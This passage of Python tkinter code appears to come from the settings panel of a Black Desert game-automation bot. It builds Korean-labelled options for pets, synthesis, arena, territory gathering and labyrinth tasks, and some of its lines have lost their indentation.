    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'],
    state = "readonly",
    height = 10,
    width = 5,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = "초"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='반려동물 - 먹이주기')
frame = ttk.Frame(frame_label)
label = ttk.Label(
    master = frame,
    text = "현재 보유 중인 펫의 수: "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PET + 'number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PET + 'number'].trace(
    'w', lambda *args: self.callback_pet_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_PET + 'number')
)
combobox_list = [str(i) for i in range(1, 21)]
if lybconstant.LYB_DO_STRING_BD_PET + 'number' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PET + 'number'] = 1
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PET + 'number'],
    state = "readonly",
    height = 10,
    width = 2,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PET + 'number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 - 검은 기운')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "무기/방어구는 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'].trace(
'w', lambda *args: self.callback_geomungiun_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun')
)
combobox_list = LYBBlackDesert.geomun_rank_list
if not lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하, 장신구는 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'].trace(
'w', lambda *args: self.callback_geomungiun2_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'geomungiun2'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하 자동 선택"
)
label.pack(side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 - 수정 합성')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'].trace(
'w', lambda *args: self.callback_sujeong_hapseong_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong')
)
combobox_list = LYBBlackDesert.sujeong_rank_list
if not lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto'].trace(
'w', lambda *args: self.callback_sujeong_hapseong_auto_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '자동',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'sujeong_hapseong_auto'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 - 광원석 합성')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'].trace(
'w', lambda *args: self.callback_gwangwonseok_hapseong_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong')
)
combobox_list = LYBBlackDesert.sujeong_rank_list
if not lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto'].trace(
'w', lambda *args: self.callback_gwangwonseok_hapseong_auto_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '자동',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'gwangwonseok_hapseong_auto'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 - 잠재력 돌파')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'].trace(
'w', lambda *args: self.callback_jamjeryeok_dolpa_rank_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank')
)
combobox_list = LYBBlackDesert.jamjeryeok_dolpa_rank_list
if lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'] = combobox_list[1]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 6,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급 이하 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'].trace(
'w', lambda *args: self.callback_jamjeryeok_dolpa_rank_order_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order')
)
combobox_list = LYBBlackDesert.jamjeryeok_dolpa_rank_order_list
if lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'] = combobox_list[1]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jamjeryeok_dolpa_rank_order'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "등급부터 사용"
)
label.pack(side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='토벌 게시판')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "토벌 임무 준비할 때 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'].trace(
'w', lambda *args: self.callback_tobeol_degrade_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'] = 0
combobox_list = [str(i) for i in range(0, 11)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'],
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'tobeol_degrade_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "단계 낮춰서 시작합니다"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='투기장')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'].trace(
'w', lambda *args: self.callback_daejeon_count_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count')
)
combobox_list = [str(i) for i in range(1, 1001)]
if lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'] = 10
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'],
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_count'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "회 진행하고 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'].trace(
'w', lambda *args: self.callback_daejeon_match_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match')
)
combobox_list = [str(i) for i in range(0, 60, 5)]
if lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'] = 30
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'],
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_match'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초 후 매칭 취소하고 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'].trace(
'w', lambda *args: self.callback_daejeon_giveup_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup')
)
combobox_list = [str(i) for i in range(0, 601, 5)]
if lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'] = 0
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'],
state = "readonly",
height = 10,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'daejeon_giveup'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초 후 항복"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='영지')
frame_inner = ttk.Frame(frame_label)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money'].trace(
'w', lambda *args: self.callback_youngji_money_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '영지 지원금',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone'].trace(
'w', lambda *args: self.callback_youngji_blackstone_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '블랙스톤',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa'].trace(
'w', lambda *args: self.callback_youngji_chuksa_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '축사',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat'].trace(
'w', lambda *args: self.callback_youngji_tukbat_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '텃밭',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'].trace(
'w', lambda *args: self.callback_youngji_tukbat_count_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count')
)
combobox_list = [str(i) for i in range(1, 5)]
if lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'] = 2
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'],
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "개 보유"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_inner.pack(anchor=tkinter.W)
frame_inner = ttk.Frame(frame_label)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip'].trace(
'w', lambda *args: self.callback_youngji_chejip_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '채집',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_inner)
combobox_list = LYBBlackDesert.chejip_list
place_combobox_list = LYBBlackDesert.chejip_place_list
for i in range(8):
    key = lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_' + str(i)
    place_key = lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_' + str(i)
    self.option_dic[key] = tkinter.StringVar(frame)
    self.option_dic[place_key] = tkinter.StringVar(frame)
    # Dispatch to the per-index callbacks dynamically instead of repeating an
    # if/elif branch per index; bind the loop-dependent callback and key as
    # lambda default arguments so each trace keeps its own values.
    # (Variable.trace is kept to match the rest of this module.)
    callback = getattr(self, 'callback_youngji_chejip_' + str(i) + '_stringvar')
    place_callback = getattr(self, 'callback_youngji_chejip_place_' + str(i) + '_stringvar')
    self.option_dic[key].trace(
        'w', lambda *args, cb=callback, k=key: cb(args, k)
    )
    self.option_dic[place_key].trace(
        'w', lambda *args, cb=place_callback, k=place_key: cb(args, k)
    )
    if i == 4:
        # The layout starts a second row at this point, so entries 5-8 are
        # placed in a fresh inner frame (same split as the original chain).
        frame.pack(anchor=tkinter.W)
        frame = ttk.Frame(frame_inner)
    if key not in self.configure.common_config[self.game_name]:
        self.configure.common_config[self.game_name][key] = combobox_list[-1]
    if place_key not in self.configure.common_config[self.game_name]:
        self.configure.common_config[self.game_name][place_key] = place_combobox_list[1]
    label = ttk.Label(
        master = frame,
        text = str(i + 1) + '. '
    )
    label.pack(side=tkinter.LEFT)
    combobox = ttk.Combobox(
        master = frame,
        values = combobox_list,
        textvariable = self.option_dic[key],
        state = "readonly",
        height = 10,
        width = 9,
        font = lybconstant.LYB_FONT
    )
    combobox.set(self.configure.common_config[self.game_name][key])
    combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
    combobox = ttk.Combobox(
        master = frame,
        values = place_combobox_list,
        textvariable = self.option_dic[place_key],
        state = "readonly",
        height = 10,
        width = 6,
        font = lybconstant.LYB_FONT
    )
    combobox.set(self.configure.common_config[self.game_name][place_key])
    combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_inner.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_head.pack(anchor=tkinter.W)
# +-----------------------------------------+
# | |
# | 작업 설정2 |
# | |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['work2_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='미궁 개척')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "난이도"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'].trace(
'w', lambda *args: self.callback_migung_gecheok_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok')
)
combobox_list = [str(i) for i in range(1, 9)]
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "단계 선택"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend'].trace(
'w', lambda *args: self.callback_migung_friend_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend')
)
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '친구',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'].trace(
'w', lambda *args: self.callback_migung_friend_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number')
)
combobox_list = [str(i) for i in range(0, 11)]
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild'].trace(
'w', lambda *args: self.callback_migung_guild_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild')
)
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '길드',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'].trace(
'w', lambda *args: self.callback_migung_guild_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number')
)
